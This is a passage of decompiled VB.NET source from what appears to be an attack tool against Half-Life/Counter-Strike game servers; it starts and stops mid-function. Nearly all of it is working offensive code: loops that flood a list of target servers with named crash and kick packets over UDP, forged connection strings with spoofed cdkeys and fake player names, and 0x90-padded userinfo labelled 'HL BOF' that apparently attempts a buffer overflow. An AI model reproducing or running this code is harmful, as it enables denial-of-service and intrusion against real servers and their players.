  2171. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2172. socket.Send(Me.COM_Munge(list2.ToArray))
  2173. list2.Clear
  2174. num4 += 1
  2175. Loop
  2176. End If
  2177. If (Me.method.SelectedIndex = &H15) Then
  2178. num3 = 1
  2179. Do While (num3 <= &H13)
  2180. list2.AddRange(DirectCast(Me.Data.KickASS, IEnumerable(Of Byte)))
  2181. num3 += 1
  2182. Loop
  2183. End If
  2184. If (Me.method.SelectedIndex = 4) Then
  2185. num4 = 1
  2186. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2187. list2.Clear
  2188. Form1.holdV = Form1.fix2(num4, 1)
  2189. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 3, 110, &H65, &H77, 0, 3, 110, &H65, &H77, 0, 3, 110, &H65, &H77, 0, 3, 110, &H65, &H77, 0, 3, 110, &H65, &H77, 0, 3, 110, &H65, &H77, 0, 0, 0 }
  2190. buffer6(0) = Form1.fixbug(num4, 1)
  2191. buffer6(1) = CByte(Form1.holdV)
  2192. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2193. socket.Send(Me.COM_Munge(list2.ToArray))
  2194. num4 += 1
  2195. Loop
  2196. End If
  2197. If (Me.method.SelectedIndex = 6) Then
  2198. num4 = 1
  2199. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2200. list2.Clear
  2201. Form1.holdV = Form1.fix2(num4, 1)
  2202. list2.AddRange(DirectCast(New Byte() { Form1.fixbug(num4, 1), CByte(Form1.holdV), 30 }, IEnumerable(Of Byte)))
  2203. list2.AddRange(DirectCast(Me.Data.KeyBug, IEnumerable(Of Byte)))
  2204. socket.Send(Me.COM_Munge(list2.ToArray))
  2205. list2.Clear
  2206. num4 += 1
  2207. Loop
  2208. End If
  2209. If (Me.method.SelectedIndex = 11) Then
  2210. num4 = 1
  2211. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2212. Form1.holdV = Form1.fix2(num4, 1)
  2213. list2.Clear
  2214. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 3, &H73, &H74, &H61, &H74, &H75, &H73, 0, 0, 0, 0 }
  2215. buffer6(0) = Form1.fixbug(num4, 1)
  2216. buffer6(1) = CByte(Form1.holdV)
  2217. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2218. socket.Send(Me.COM_Munge(list2.ToArray))
  2219. list2.Clear
  2220. num4 += 1
  2221. Loop
  2222. End If
  2223. If (Me.method.SelectedIndex = 12) Then
  2224. num4 = 1
  2225. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2226. Form1.holdV = Form1.fix2(num4, 1)
  2227. list2.Clear
  2228. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 3, &H73, &H68, &H6F, &H77, &H69, 110, &H66, &H6F, 0 }
  2229. buffer6(0) = Form1.fixbug(num4, 1)
  2230. buffer6(1) = CByte(Form1.holdV)
  2231. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2232. socket.Send(Me.COM_Munge(list2.ToArray))
  2233. list2.Clear
  2234. num4 += 1
  2235. Loop
  2236. End If
  2237. If (Me.method.SelectedIndex = 13) Then
  2238. num4 = 1
  2239. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2240. Form1.holdV = Form1.fix2(num4, 1)
  2241. list2.Clear
  2242. buffer6 = New Byte() { 0, 0, 30, 0, 0, 0, 0, 0, 0, 3, &H66, &H75, &H6C, &H6C, &H75, &H70, 100, &H61, &H74, &H65, 0, 0, 0 }
  2243. buffer6(0) = Form1.fixbug(num4, 1)
  2244. buffer6(1) = CByte(Form1.holdV)
  2245. list2.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2246. socket.Send(Me.COM_Munge(list2.ToArray))
  2247. list2.Clear
  2248. num4 += 1
  2249. Loop
  2250. End If
  2251. If (Me.method.SelectedIndex = 7) Then
  2252. num4 = 1
  2253. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2254. Form1.holdV = Form1.fix2(num4, 1)
  2255. list.Clear
  2256. buffer6 = New Byte() { 0, 30, 0, 0, 0, 0, 0, 0, 0, 3, &H6B, &H69, &H63, &H6B, 0, 3, 0, 3, &H6B, &H69, &H63, &H6B, 0, 3, 0 }
  2257. buffer6(0) = Form1.fixbug(num4, 1)
  2258. list.AddRange(DirectCast(buffer6, IEnumerable(Of Byte)))
  2259. socket.Send(Me.COM_Munge(list.ToArray))
  2260. list.Clear
  2261. num4 += 1
  2262. Loop
  2263. End If
  2264. list2.Clear
  2265. If (Me.method.SelectedIndex = 5) Then
  2266. num4 = 1
  2267. Do While (num4 <= Convert.ToInt32(Me.textBox2.Text))
  2268. Form1.holdV = Form1.fix2(num4, 1)
  2269. list2.Clear
  2270. list2.AddRange(DirectCast(New Byte() { Form1.fixbug(num4, 1), CByte(Form1.holdV) }, IEnumerable(Of Byte)))
  2271. list2.AddRange(DirectCast(Me.Data.CmdFake, IEnumerable(Of Byte)))
  2272. list2.AddRange(DirectCast(Encoding.ASCII.GetBytes(Message), IEnumerable(Of Byte)))
  2273. list2.AddRange(DirectCast(New Byte(2 - 1) {}, IEnumerable(Of Byte)))
  2274. socket.Send(Me.COM_Munge(list2.ToArray))
  2275. num4 += 1
  2276. Loop
  2277. End If
  2278. If (Me.comboBox1.SelectedIndex = 2) Then
  2279. socket.Close
  2280. End If
  2281. If (Me.comboBox1.SelectedIndex = 0) Then
  2282. num4 = 1
  2283. Do While (num4 <= 2)
  2284. Form1.holdV = Form1.fix2(num4, 1)
  2285. list.Clear
  2286. list.AddRange(DirectCast(Me.Data.DropClient, IEnumerable(Of Byte)))
  2287. socket.Send(Me.COM_Munge(list.ToArray))
  2288. socket.Receive(buffer)
  2289. num4 += 1
  2290. Loop
  2291. End If
  2292. If (Me.comboBox1.SelectedIndex = 1) Then
  2293. list2.Clear
  2294. list2.AddRange(DirectCast(Me.Data.DropClientError, IEnumerable(Of Byte)))
  2295. socket.Send(list2.ToArray)
  2296. socket.Receive(buffer)
  2297. End If
  2298. If (Me.comboBox1.SelectedIndex = 3) Then
  2299. socket.Send(list2.ToArray)
  2300. socket.Receive(buffer)
  2301. End If
  2302. Dim bytes As Byte() = Me.COM_UnMunge(buffer)
  2303. str = New String(Enumerable.ToArray(Of Char)(Enumerable.Select(Of Char, Char)(Encoding.ASCII.GetString(bytes, 0, bytes.Length), Function (ByVal c As Char)
  2304. If ((c > ChrW(0)) AndAlso (c <> ChrW(10))) Then
  2305. Return c
  2306. End If
  2307. Return "P"c
  2308. End Function)))
  2309. If Not Me.checkBox8.Checked Then
  2310. Return str
  2311. End If
  2312. If str.Contains("Too many resources in client resource list") Then
  2313. Return " Too many resources in client resource list"
  2314. End If
  2315. If str.Contains("You?ap") Then
  2316. Return ">> You are banned from the server."
  2317. End If
  2318. If str.Contains("This server is using an newer protocol") Then
  2319. Return " This server is using an newer protocol (47-48)."
  2320. End If
  2321. If str.Contains("Error!Auth Violation(2).") Then
  2322. Return " Error ! Auth Violation."
  2323. End If
  2324. If str.Contains("Fake players spamming or protocol violation") Then
  2325. Return " Fake players spamming or protocol violation."
  2326. End If
  2327. If str.Contains("sent") Then
  2328. Return " Client sent drop."
  2329. End If
  2330. If str.Contains("???" & ChrW(2) & "???") Then
  2331. Return " Connected."
  2332. End If
  2333. If str.Contains("Kicked") Then
  2334. Return " You are kicked from the server."
  2335. End If
  2336. If str.Contains("9Bad") Then
  2337. Return " Bad Challenge."
  2338. End If
  2339. If (str.Contains("9STE") OrElse str.Contains("You?U8?")) Then
  2340. Return "STEAM UserID is already in use on this server."
  2341. End If
  2342. If str.Contains("Timed") Then
  2343. Return " Timed out."
  2344. End If
  2345. If str.Contains("Hac?") Then
  2346. Return " Hacker xD"
  2347. End If
  2348. If str.Contains("character") Then
  2349. Return " Bad command in client_command."
  2350. End If
  2351. If str.Contains("BZ2") Then
  2352. Return " Privileges set."
  2353. End If
  2354. If str.Contains("Privileges ") Then
  2355. str = " Privileges set."
  2356. Else
  2357. If Not str.Contains("PP") Then
  2358. Return str
  2359. End If
  2360. str = " Privileges set."
  2361. End If
  2362. Catch exception As Exception
  2363. str = ("Socket problem " & exception)
  2364. End Try
  2365. Return str
  2366. End Function
  2367.  
  2368. Private Sub ServerListRichBox_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  2369. Me.Label4.Text = ("Servers : " & Enumerable.Count(Of String)((From line In DirectCast(Me.ServerListRichBox.Lines, IEnumerable(Of String))
  2370. Where Not String.IsNullOrEmpty(line)
  2371. Select line)).ToString)
  2372. End Sub
  2373.  
  2374. Public Sub setExploit(ByVal IP As String)
  2375. Dim num As Integer
  2376. Dim strArray As String()
  2377. Dim point As IPEndPoint
  2378. Dim socket As Socket
  2379. Dim num2 As Integer
  2380. Dim list As List(Of Byte)
  2381. Dim buffer As Byte()
  2382. Dim num3 As Integer
  2383. If (Me.method.SelectedIndex = &H1C) Then
  2384. num
  2385. For num = 0 To Me.ServerListRichBox.Lines.Length - 1
  2386. If Not String.IsNullOrEmpty(Me.ServerListRichBox.Lines(num)) Then
  2387. strArray = IP.Split(New Char() { ":"c })
  2388. point = New IPEndPoint(IPAddress.Parse(strArray(0)), Convert.ToInt32(strArray(1)))
  2389. socket = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  2390. If (Integer.TryParse(Me.textBox12.Text, num2) AndAlso (num2 > 0)) Then
  2391. socket.SendTimeout = num2
  2392. socket.ReceiveTimeout = num2
  2393. End If
  2394. socket.Connect(point)
  2395. list = New List(Of Byte)
  2396. buffer = New Byte(&H800 - 1) {}
  2397. num3 = 1
  2398. Do While (num3 <= Convert.ToInt32(Me.textBox2.Text))
  2399. socket.Send(Me.Data.KickASS2)
  2400. socket.Send(Me.Data.KickASS2)
  2401. socket.Send(Me.Data.KickASS2)
  2402. socket.Send(Me.Data.KickASS2)
  2403. socket.Send(Me.Data.KickASS2)
  2404. socket.Send(Me.Data.KickASS2)
  2405. num3 += 1
  2406. Loop
  2407. End If
  2408. Next num
  2409. End If
  2410. If (Me.method.SelectedIndex = &H22) Then
  2411. num
  2412. For num = 0 To Me.ServerListRichBox.Lines.Length - 1
  2413. If Not String.IsNullOrEmpty(Me.ServerListRichBox.Lines(num)) Then
  2414. strArray = IP.Split(New Char() { ":"c })
  2415. point = New IPEndPoint(IPAddress.Parse(strArray(0)), Convert.ToInt32(strArray(1)))
  2416. socket = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  2417. If (Integer.TryParse(Me.textBox12.Text, num2) AndAlso (num2 > 0)) Then
  2418. socket.SendTimeout = num2
  2419. socket.ReceiveTimeout = num2
  2420. End If
  2421. socket.Connect(point)
  2422. list = New List(Of Byte)
  2423. buffer = New Byte(&H800 - 1) {}
  2424. num3 = 1
  2425. Do While (num3 <= Convert.ToInt32(Me.textBox2.Text))
  2426. socket.Send(Me.Data.gamedir)
  2427. num3 += 1
  2428. Loop
  2429. End If
  2430. Next num
  2431. End If
  2432. If (Me.method.SelectedIndex = &H1D) Then
  2433. num
  2434. For num = 0 To Me.ServerListRichBox.Lines.Length - 1
  2435. If Not String.IsNullOrEmpty(Me.ServerListRichBox.Lines(num)) Then
  2436. strArray = IP.Split(New Char() { ":"c })
  2437. point = New IPEndPoint(IPAddress.Parse(strArray(0)), Convert.ToInt32(strArray(1)))
  2438. socket = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  2439. If (Integer.TryParse(Me.textBox12.Text, num2) AndAlso (num2 > 0)) Then
  2440. socket.SendTimeout = num2
  2441. socket.ReceiveTimeout = num2
  2442. End If
  2443. socket.Connect(point)
  2444. list = New List(Of Byte)
  2445. buffer = New Byte(&H800 - 1) {}
  2446. num3 = 1
  2447. Do While (num3 <= Convert.ToInt32(Me.textBox2.Text))
  2448. socket.Send(Me.Data.KickASS3)
  2449. socket.Send(Me.Data.KickASS3p7)
  2450. socket.Send(Me.Data.KickASS3p3)
  2451. socket.Send(Me.Data.KickASS3p6)
  2452. socket.Send(Me.Data.KickASS3p4)
  2453. socket.Send(Me.Data.KickASS3p5)
  2454. socket.Send(Me.Data.KickASS3p2)
  2455. socket.Send(Me.Data.KickASS3)
  2456. socket.Send(Me.Data.KickASS3p7)
  2457. socket.Send(Me.Data.KickASS3p3)
  2458. socket.Send(Me.Data.KickASS3p6)
  2459. socket.Send(Me.Data.KickASS3p4)
  2460. socket.Send(Me.Data.KickASS3p5)
  2461. socket.Send(Me.Data.KickASS3p2)
  2462. num3 += 1
  2463. Loop
  2464. End If
  2465. Next num
  2466. End If
  2467. If (Me.method.SelectedIndex = 30) Then
  2468. num
  2469. For num = 0 To Me.ServerListRichBox.Lines.Length - 1
  2470. If Not String.IsNullOrEmpty(Me.ServerListRichBox.Lines(num)) Then
  2471. strArray = IP.Split(New Char() { ":"c })
  2472. point = New IPEndPoint(IPAddress.Parse(strArray(0)), Convert.ToInt32(strArray(1)))
  2473. socket = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  2474. If (Integer.TryParse(Me.textBox12.Text, num2) AndAlso (num2 > 0)) Then
  2475. socket.SendTimeout = num2
  2476. socket.ReceiveTimeout = num2
  2477. End If
  2478. socket.Connect(point)
  2479. list = New List(Of Byte)
  2480. buffer = New Byte(&H800 - 1) {}
  2481. num3 = 1
  2482. Do While (num3 <= Convert.ToInt32(Me.textBox2.Text))
  2483. socket.Send(Me.Data.KickASS4)
  2484. num3 += 1
  2485. Loop
  2486. End If
  2487. Next num
  2488. End If
  2489. End Sub
  2490.  
  2491. Private Sub textBox10_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  2492. End Sub
  2493.  
  2494. Private Sub textBox3_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  2495. End Sub
  2496.  
  2497. Private Sub textBox5_TextChanged(ByVal sender As Object, ByVal e As EventArgs)
  2498. End Sub
  2499.  
  2500. Private Sub textBox9_KeyPress(ByVal sender As Object, ByVal e As KeyPressEventArgs)
  2501. If Not (Char.IsControl(e.KeyChar) OrElse Char.IsDigit(e.KeyChar)) Then
  2502. e.Handled = True
  2503. End If
  2504. If ((e.KeyChar = "."c) AndAlso (TryCast(sender,TextBox).Text.IndexOf("."c) > -1)) Then
  2505. e.Handled = True
  2506. End If
  2507. End Sub
  2508.  
  2509. Private Sub timer1_Tick(ByVal sender As Object, ByVal e As EventArgs)
  2510. End Sub
  2511.  
  2512. Private Sub timer1_Tick_1(ByVal sender As Object, ByVal e As EventArgs)
  2513. Dim num As Integer
  2514. Me.LogRichBox.Text.Replace("R" & ChrW(2) & "PX" & ChrW(2) & ChrW(2) & ChrW(16) & "XX" & ChrW(2) & "?" & ChrW(24) & "XB" & ChrW(16) & "?" & ChrW(24) & ChrW(2) & "@" & ChrW(16) & ChrW(2) & "B" & ChrW(16) & "@" & ChrW(16) & "BP" & ChrW(16) & "B" & ChrW(2) & "@P" & ChrW(18) & ChrW(2) & ChrW(16) & "@P" & ChrW(2) & "?" & ChrW(16) & "B" & ChrW(2) & ChrW(16) & ChrW(8) & ChrW(18) & "B" & ChrW(16) & ChrW(24) & ChrW(8) & "B@" & ChrW(24) & ChrW(24) & ChrW(2) & "PH" & ChrW(26) & "B?PHBP?", "")
  2515. If String.IsNullOrEmpty(Me.textBox2.Text) Then
  2516. Me.timer1.Stop
  2517. num = CInt(MessageBox.Show("Packets is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2518. Me.textBox2.Text = "130"
  2519. End If
  2520. If String.IsNullOrEmpty(Me.textBox16.Text) Then
  2521. Me.timer1.Stop
  2522. num = CInt(MessageBox.Show("Value is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2523. Me.textBox16.Text = "15"
  2524. End If
  2525. If String.IsNullOrEmpty(Me.textBox7.Text) Then
  2526. Me.timer1.Stop
  2527. num = CInt(MessageBox.Show("Setinfo is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2528. Me.textBox7.Text = "_pw"
  2529. End If
  2530. If String.IsNullOrEmpty(Me.asd2.Text) Then
  2531. Me.timer1.Stop
  2532. num = CInt(MessageBox.Show("Setinfo is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2533. End If
  2534. If String.IsNullOrEmpty(Me.textBox9.Text) Then
  2535. Me.timer1.Stop
  2536. num = CInt(MessageBox.Show("Repeat is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2537. Me.textBox9.Text = "1"
  2538. End If
  2539. If String.IsNullOrEmpty(Me.textBox1.Text) Then
  2540. Me.timer1.Stop
  2541. num = CInt(MessageBox.Show("Proxy is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2542. Me.textBox1.Text = "_ip"
  2543. End If
  2544. If String.IsNullOrEmpty(Me.textBox6.Text) Then
  2545. Me.timer1.Stop
  2546. num = CInt(MessageBox.Show("Password is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2547. Me.textBox6.Text = "1234"
  2548. End If
  2549. If String.IsNullOrEmpty(Me.textBox5.Text) Then
  2550. Me.timer1.Stop
  2551. num = CInt(MessageBox.Show("Interval is null", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand))
  2552. Me.textBox5.Text = "1000"
  2553. End If
  2554. If (Me.countT = Convert.ToInt32(Me.textBox2.Text)) Then
  2555. Me.timer1.Stop
  2556. Me.countT = 0
  2557. Else
  2558. Dim num2 As Integer = 0
  2559. Dim index As Integer = 0
  2560. Dim num4 As Integer = 0
  2561. Dim i As Integer
  2562. For i = 0 To Me.ServerListRichBox.Lines.Length - 1
  2563. If Not String.IsNullOrEmpty(Me.ServerListRichBox.Lines(i)) Then
  2564. Dim j As Integer = 0
  2565. Do While ((Convert.ToInt32(Me.textBox9.Text) = 0) OrElse (j < Convert.ToInt32(Me.textBox9.Text)))
  2566. Dim str13 As String
  2567. If ((num2 = 1) AndAlso Me.runOnce.Checked) Then
  2568. Me.timer1.Stop
  2569. Exit Do
  2570. End If
  2571. num2 += 1
  2572. If (index >= Me.NicknamesRichBox.Lines.Length) Then
  2573. index = 0
  2574. End If
  2575. If (num4 >= Me.HLProxyRichBox.Lines.Length) Then
  2576. num4 = 0
  2577. End If
  2578. Dim str As String = If((Me.HLProxyRichBox.Text.Length > 0), Me.HLProxyRichBox.Lines(num4), Nothing)
  2579. If (Me.AuthtypeComboBox.SelectedIndex = 1) Then
  2580. Me.checkBox2.Enabled = False
  2581. Me.checkBox2.Checked = False
  2582. End If
  2583. If (Me.AuthtypeComboBox.SelectedIndex = 2) Then
  2584. Me.checkBox2.Enabled = False
  2585. Me.checkBox2.Checked = False
  2586. End If
  2587. If (Me.AuthtypeComboBox.SelectedIndex = 0) Then
  2588. If Me.checkBox6.Checked Then
  2589. Me.checkBox2.Enabled = False
  2590. Me.textBox8.Text = "HLTV"
  2591. Else
  2592. Me.checkBox2.Enabled = True
  2593. End If
  2594. End If
  2595. Dim userInfo As String = String.Concat(New String() { "\prot\", If((Me.AuthtypeComboBox.SelectedIndex = 0), "3", ""), If((Me.AuthtypeComboBox.SelectedIndex = 1), "2", ""), If((Me.AuthtypeComboBox.SelectedIndex = 2), "4", ""), "\unique\-1\raw\" })
  2596. Dim random As New Random
  2597. Dim str3 As New String(Enumerable.ToArray(Of Char)((From s In Enumerable.Repeat(Of String)("0123456789abc", &H20) Select s.Chars(random.Next(s.Length)))))
  2598. Dim random As New Random
  2599. If String.IsNullOrEmpty(Me.textBox16.Text) Then
  2600. Me.textBox16.Text = "15"
  2601. Exit Do
  2602. End If
  2603. Convert.ToInt32(Me.textBox16.Text)
  2604. Dim length As Integer = Integer.Parse(Me.textBox16.Text)
  2605. Dim str4 As String = Form1.RandomRevemuString(length)
  2606. Dim random44 As New Random
  2607. Dim str5 As New String(Enumerable.ToArray(Of Char)((From s In Enumerable.Repeat(Of String)("ĄßÇĐË₣ĞҢĨĴҜĽмŅƠρQŔŚŤỪνẂχỴŻâъċđēƒģңĭĵқŀოʼnǿрqřšŧūυשּׁҳỷž", length) Select s.Chars(random44.Next(s.Length)))))
  2608. If Me.checkBox18.Checked Then
  2609. str4 = (String.Empty & str5)
  2610. End If
  2611. If (Me.method.SelectedIndex = 10) Then
  2612. Me.checkBox1.Enabled = False
  2613. str4 = (str4 & ".ú.")
  2614. Else
  2615. Me.checkBox1.Enabled = True
  2616. End If
  2617. If (Me.AuthtypeComboBox.SelectedIndex = 0) Then
  2618. userInfo = (userInfo & "steam")
  2619. ElseIf (Me.AuthtypeComboBox.SelectedIndex = 1) Then
  2620. userInfo = (userInfo & str3)
  2621. ElseIf (Me.AuthtypeComboBox.SelectedIndex = 2) Then
  2622. userInfo = (userInfo & str3)
  2623. End If
  2624. If Me.checkBox3.Checked Then
  2625. userInfo = If((Me.method.SelectedIndex <> &H1A), (userInfo & "\cdkey\" & str3 & """ """), (userInfo & "\cdkey\" & str3 & """"" """))
  2626. Me.textBox4.Text = str3
  2627. End If
  2628. Dim text As String = Me.textBox4.Text
  2629. If Not Me.checkBox3.Checked Then
  2630. userInfo = (userInfo & "\cdkey\" & [text] & """ """)
  2631. End If
  2632. Dim random2 As New Random
  2633. Dim num8 As Integer = random2.Next(1, 100)
  2634. Dim num9 As Integer = random2.Next(0, 2)
  2635. Dim num10 As Integer = random2.Next(0, 2)
  2636. Dim num11 As Integer = random2.Next(0, 2)
  2637. random2.Next(0, 300)
  2638. Dim num12 As Integer = random2.Next(10)
  2639. Dim num13 As Integer = random2.Next(20, 150)
  2640. Dim num14 As Integer = random2.Next(0, &H400)
  2641. Dim num15 As Integer = random2.Next(&HDAC, &HC350)
  2642. Dim num16 As Integer = random2.Next(&H7530)
  2643. Dim list As New List(Of String) From { "arctic", "gign", "gsg9", "leet", "sas", "terror", "urban", "vip", "guerilla" }
  2644. Dim num17 As Integer = random.Next(list.Count)
  2645. Dim str7 As String = list.Item(num17)
  2646. list.RemoveAt(num17)
  2647. Dim str8 As String = ("\_cl_autowepswitch\" & num10 & "\model\" & ChrW(10) & " HL BOF \name\")
  2648. Dim str9 As String = String.Concat(New Object() { "\_cl_autowepswitch\", num10, "\model\", str7, "\name\" })
  2649. Dim str10 As String = If(("\*hltv\1\hdelay\" & num13) <> Nothing , ("\*hltv\1\hdelay\" & num13), "")
  2650. Dim str11 As String = ("\" & Me.textBox7.Text & "\" & Me.asd2.Text)
  2651. Dim str12 As String = If(String.Concat(New Object() { "\bottomcolor\", num8, "\cl_lc\", num9, "\_vgui_menus\", num10, "\cl_lw\", num11, "\topcolor\", num12, "\cl_updaterate\", num13, str11, "\cl_dlmax\", num14, "\rate\", num15 }) <> Nothing , String.Concat(New Object() { "\bottomcolor\", num8, "\cl_lc\", num9, "\_vgui_menus\", num10, "\cl_lw\", num11, "\topcolor\", num12, "\cl_updaterate\", num13, str11, "\cl_dlmax\", num14, "\rate\", num15 }), "")
  2652. If Me.checkBox1.Checked Then
  2653. If Me.checkBox11.Checked Then
  2654. userInfo = String.Concat(New Object() { userInfo, str9, ChrW(144) & "a" & ChrW(144) & "b" & ChrW(144) & ChrW(144) & "c" & ChrW(144) & "d" & ChrW(144) & ChrW(144) & "e" & ChrW(144) & "e" & ChrW(144) & "f" & ChrW(144) & ChrW(144) & "gc" & ChrW(144) & ChrW(144) & ChrW(144) & ChrW(144), &H90, str4 })
  2655. End If
  2656. If (Me.method.SelectedIndex = &H1A) Then
  2657. userInfo = (userInfo & str8 & str4)
  2658. End If
  2659. If (Me.method.SelectedIndex = 9) Then
  2660. str13 = ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(8) & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " ë"
  2661. userInfo = (userInfo & str9 & str13)
  2662. Else
  2663. If Me.checkBox6.Checked Then
  2664. userInfo = (userInfo & str9 & str4 & str10)
  2665. End If
  2666. userInfo = (userInfo & str9 & str4)
  2667. Me.NicknamesRichBox.Text = str4
  2668. End If
  2669. ElseIf Not Me.checkBox1.Checked Then
  2670. If (Me.method.SelectedIndex = 9) Then
  2671. str13 = ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(8) & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " " & ChrW(144) & " ë"
  2672. userInfo = (userInfo & str9 & str13)
  2673. Else
  2674. If Me.checkBox6.Checked Then
  2675. userInfo = (userInfo & str9 & Me.NicknamesRichBox.Lines(index) & str10)
  2676. End If
  2677. userInfo = (userInfo & str9 & Me.NicknamesRichBox.Lines(index))
  2678. End If
  2679. End If
  2680. If Not String.IsNullOrEmpty(str) Then
  2681. userInfo = String.Concat(New String() { userInfo, "\", Me.textBox1.Text, "\", Me.ServerListRichBox.Lines(i) })
  2682. End If
  2683. Dim str14 As String = ("\password\" & Me.textBox6.Text)
  2684. If Me.checkBox5.Checked Then
  2685. If String.IsNullOrEmpty(Me.textBox7.Text) Then
